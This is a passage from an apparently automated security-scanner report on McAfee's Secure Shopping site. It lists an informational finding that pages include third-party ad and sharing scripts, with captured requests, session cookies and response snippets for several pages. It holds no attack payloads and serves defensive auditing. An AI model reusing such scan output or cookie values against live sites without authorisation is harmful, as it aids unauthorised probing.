z7xNxt9VFL67w%26brand%3DGraco%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvLy%252FXS67MTazQS87P1XfOz83Nz9MPKMpPKU0u0XdOLIEy9RKLCyrsPV1sjUzMTUzM1YKLkm2dUoFaUkFMoLiJkZGJqYkZAFwqYwpWAAAA"onclick="return trackclick(0);"><img alt="Cymax" border=0 src="http://image.become.com/imageserver/s1/717012811-88-31-5-0/"></a>
...[SNIP]...
7xNxt9VFL67w%26brand%3DGraco%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvLy%252FXS67MTazQS87P1XfOz83Nz9MPKMpPKU0u0XdOLIEy9RKLCyrsPV1sjUzMTUzM1YKLkm2dUoFaUkFMoLiJkZGJqYkZAFwqYwpWAAAA" onclick="return trackclick(0);"><img alt="McAfee SECURE Certified Site" width=115 height=32 border=0 src="//images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
5aptg%26brand%3DGraco%26u%3DH4sIAAAAAAAAAC3KQQqAIBBA0du0VNpEBBF0kRht0AFHRUek21fU8n%252BeF8mL1r13BcEgGjCXsom1KxQr1HEGipPywmFrwkdNrVhcd3wMDu9hPKnxauuXFjgDufiTG1M6PwNgAAAA"onclick="return trackclick(1);"><img alt="Albee Baby" border=0 src="http://image.become.com/imageserver/s0/569828030-88-31-5-0/"></a>
...[SNIP]...
aptg%26brand%3DGraco%26u%3DH4sIAAAAAAAAAC3KQQqAIBBA0du0VNpEBBF0kRht0AFHRUek21fU8n%252BeF8mL1r13BcEgGjCXsom1KxQr1HEGipPywmFrwkdNrVhcd3wMDu9hPKnxauuXFjgDufiTG1M6PwNgAAAA" onclick="return trackclick(1);"><img alt="McAfee SECURE Certified Site" width=115 height=32 border=0 src="//images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</a>
 - 
<a target=_top href="http://www.mcafeesecure.com/us/terms.jsp">Terms of Service</a>
...[SNIP]...

3. Cross-domain script include previous next
There are 175 instances of this issue:

/
/11-6-hard-shell-netbook-sleeve-magenta--pid-215156920
/11-6-molded-netbook-sleeve-notebook-sleeve--pid-215156776
/about.jsp
/browse/
/browse/baby/
/browse/baby/apparel/
/browse/baby/apparel/blankets/
/browse/baby/apparel/dresses-gowns/
/browse/baby/apparel/footwear/
/browse/baby/apparel/hats-caps/
/browse/baby/apparel/jackets/
/browse/baby/apparel/jumpsuits/
/browse/baby/apparel/layette/
/browse/baby/apparel/leggings-tights/
/browse/baby/apparel/pajamas/
/browse/baby/apparel/pants/
/browse/baby/apparel/shirts/
/browse/baby/apparel/sweaters/
/browse/baby/apparel/swimwear/
/browse/baby/bathing/
/browse/baby/bathing/bath-tubs/
/browse/baby/bathing/hooded-towels/
/browse/baby/bathing/lotion/
/browse/baby/bathing/potty-training/
/browse/baby/bathing/powder/
/browse/baby/bathing/shampoo/
/browse/baby/bathing/soap/
/browse/baby/bathing/washcloths/
/browse/baby/bedding/
/browse/baby/bedding/bedskirts/
/browse/baby/bedding/blankets/
/browse/baby/bedding/bumper-pads/
/browse/baby/bedding/comforters/
/browse/baby/bedding/crib-sets/
/browse/baby/bedding/hooded-towels/
/browse/baby/bedding/mattress-pads/
/browse/baby/bedding/sheets/
/browse/baby/bedding/washcloths/
/browse/baby/diapering/
/browse/baby/diapering/baby-wipes/
/browse/baby/diapering/diaper-bags/
/browse/baby/diapering/diaper-covers/
/browse/baby/diapering/diaper-storage-disposal/
/browse/baby/diapering/diapers/
/browse/baby/diapering/skin-care/
/browse/baby/feeding/
/browse/baby/feeding/baby-food-grinders/
/browse/baby/feeding/baby-food/
/browse/baby/feeding/bibs/
/browse/baby/feeding/bottles/
/browse/baby/feeding/breast-pumps/
/browse/baby/feeding/formula/
/browse/baby/feeding/milk-storage-bags/
/browse/baby/feeding/nipples/
/browse/baby/feeding/nursing-apparel/
/browse/baby/feeding/nursing-bras/
/browse/baby/feeding/nursing-pads/
/browse/baby/feeding/nursing-pillows/
/browse/baby/feeding/spoons-forks/
/browse/baby/furniture/
/browse/baby/furniture/bassinets/
/browse/baby/furniture/changing-tables/
/browse/baby/furniture/cribs/
/browse/baby/furniture/dressers/
/browse/baby/furniture/gliders-walkers/
/browse/baby/furniture/high-chairs/
/browse/baby/furniture/lamps-shades/
/browse/baby/furniture/mobiles/
/browse/baby/furniture/moses-baskets/
/browse/baby/furniture/night-lights/
/browse/baby/furniture/play-pens/
/browse/baby/furniture/rocking-chairs/
/browse/baby/furniture/swings-bouncers/
/browse/baby/furniture/toddler-bed/
/browse/baby/furniture/toy-chests/
/browse/baby/health/
/browse/baby/health/brushes-combs/
/browse/baby/health/diaper-rash-ointment/
/browse/baby/health/pacifiers/
/browse/baby/health/teethers/
/browse/baby/health/teething-relief/
/browse/baby/health/thermometers/
/browse/baby/health/toilet-training/
/browse/baby/safety/
/browse/baby/safety/baby-monitors/
/browse/baby/safety/bath-safety/
/browse/baby/safety/door-knob-covers/
/browse/baby/safety/drawer-cabinet-locks/
/browse/baby/safety/night-lights/
/browse/baby/safety/outlet-covers/
/browse/baby/safety/safety-gates/
/browse/baby/safety/safety-kits/
/browse/baby/toys/
/browse/baby/toys/activity-toys/
/browse/baby/toys/bath-toys/
/browse/baby/toys/learning-toys/
/browse/baby/toys/mobiles/
/browse/baby/toys/music-toys/
/browse/baby/toys/play-gyms-mats/
/browse/baby/toys/pull-along-toys/
/browse/baby/toys/rattles/
/browse/baby/toys/stuffed-toys/
/browse/baby/travel/
/browse/baby/travel/baby-carriers/
/browse/baby/travel/car-seats/
/browse/baby/travel/strollers/
/browse/clothing-accessories/
/browse/clothing-accessories/jewelry-watches/
/browse/collectibles-art/
/browse/computers/
/browse/computers/accessories/
/browse/computers/accessories/audio-video-accessories/
/browse/computers/accessories/bags,-cases-covers/
/browse/computers/accessories/batteries-chargers/
/browse/computers/accessories/camcorder-accessories/
/browse/computers/accessories/camera-accessories/
/browse/computers/accessories/camera-lenses/
/browse/computers/accessories/cell-phone-accessories/
/browse/computers/accessories/desktop-accessories/
/browse/computers/accessories/gps-accessories/
/browse/computers/accessories/headphones/
/browse/computers/accessories/microphones/
/browse/computers/accessories/monitor-accessories/
/browse/computers/accessories/mp3-player-accessories/
/browse/computers/accessories/notebook-pda-accessories/
/browse/computers/accessories/paper-supplies/
/browse/computers/accessories/printer-supplies/
/browse/computers/accessories/racks,-mounts-cabinets/
/browse/computers/accessories/remote-controls/
/browse/computers/accessories/scanner-accessories/
/browse/computers/accessories/storage-media/
/browse/computers/cables-adapters/
/browse/computers/cpu,-chassis-components/
/browse/computers/cpu,-chassis-components/cases/
/browse/computers/cpu,-chassis-components/cpu/
/browse/computers/cpu,-chassis-components/motherboards/
/browse/computers/desktops/
/browse/computers/graphics/
/browse/computers/handhelds-pda/
/browse/computers/input-devices/
/browse/computers/input-devices/joysticks-gamepads/
/browse/computers/input-devices/keyboards/
/browse/computers/input-devices/mice/
/browse/computers/monitors/
/browse/computers/network-communications/
/browse/computers/network-communications/adapters-interfaces/
/browse/computers/network-communications/bridges,-routers,-gateways/
/browse/computers/network-communications/modems/
/browse/computers/network-communications/network-hubs-switches/
/browse/computers/servers/terminals-thin-clients/
/browse/electronics/
/browse/electronics/digital-cameras/
/browse/food-wine/
/browse/health-beauty/
/browse/home-garden/
/browse/jewelry-watches/
/browse/magazines/
/browse/movies/
/browse/music/
/browse/office-products/
/browse/software/
/browse/sports-outdoors/
/browse/toys/
/browse/toys/cars,-trains-planes/
/browse/video-games/
/canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577
/hot-products
/legal.jsp
/merchants-intro.jsp
/popular-searches
/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116
/shop/holiday-cards
/shop/holiday-gifts
/shop/holiday-home-decor

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

3.1. http://secureshopping.mcafee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET / HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293247781225-3-y4N6; path=/; expires=Sun, 25-Dec-2011 03:29:40 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:29:40 GMT
Content-Length: 40883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping - Secure Online Shopping</title>
<meta name="d
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.2. http://secureshopping.mcafee.com/11-6-hard-shell-netbook-sleeve-magenta--pid-215156920 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/11-6-hard-shell-netbook-sleeve-magenta--pid-215156920

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /11-6-hard-shell-netbook-sleeve-magenta--pid-215156920 HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:21 GMT
Set-Cookie: user=id=1293248423528-1-dMZf&ph=215156920; path=/; expires=Sun, 25-Dec-2011 03:53:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:21 GMT
Content-Length: 20259

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping - Securely Find Prices on 11.6 Hard Shell Netb
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.3. http://secureshopping.mcafee.com/11-6-molded-netbook-sleeve-notebook-sleeve--pid-215156776 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/11-6-molded-netbook-sleeve-notebook-sleeve--pid-215156776

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /11-6-molded-netbook-sleeve-notebook-sleeve--pid-215156776 HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:22 GMT
Set-Cookie: user=id=1293248423528-1-dMZf&ph=215156776; path=/; expires=Sun, 25-Dec-2011 03:53:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:22 GMT
Content-Length: 20460

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping - Securely Find Prices on 11.6 Molded Netbook
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.4. http://secureshopping.mcafee.com/about.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/about.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /about.jsp HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:12 GMT
Content-Length: 9848

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>About - McAfee Secure Shopping</title>
<meta name="description" conte
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.5. http://secureshopping.mcafee.com/browse/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:11 GMT
Content-Length: 47105

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View All Categories at McAfee Secure Shopping - Search, Discover &amp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.6. http://secureshopping.mcafee.com/browse/baby/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/ HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.7.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:13 GMT
Content-Type: text/html; charset=utf-8
Date: Sat, 25 Dec 2010 03:42:13 GMT
Content-Length: 67844

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.7. http://secureshopping.mcafee.com/browse/baby/apparel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

3.8. http://secureshopping.mcafee.com/browse/baby/apparel/blankets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/blankets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/blankets/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:19 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:19 GMT
Content-Length: 65723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

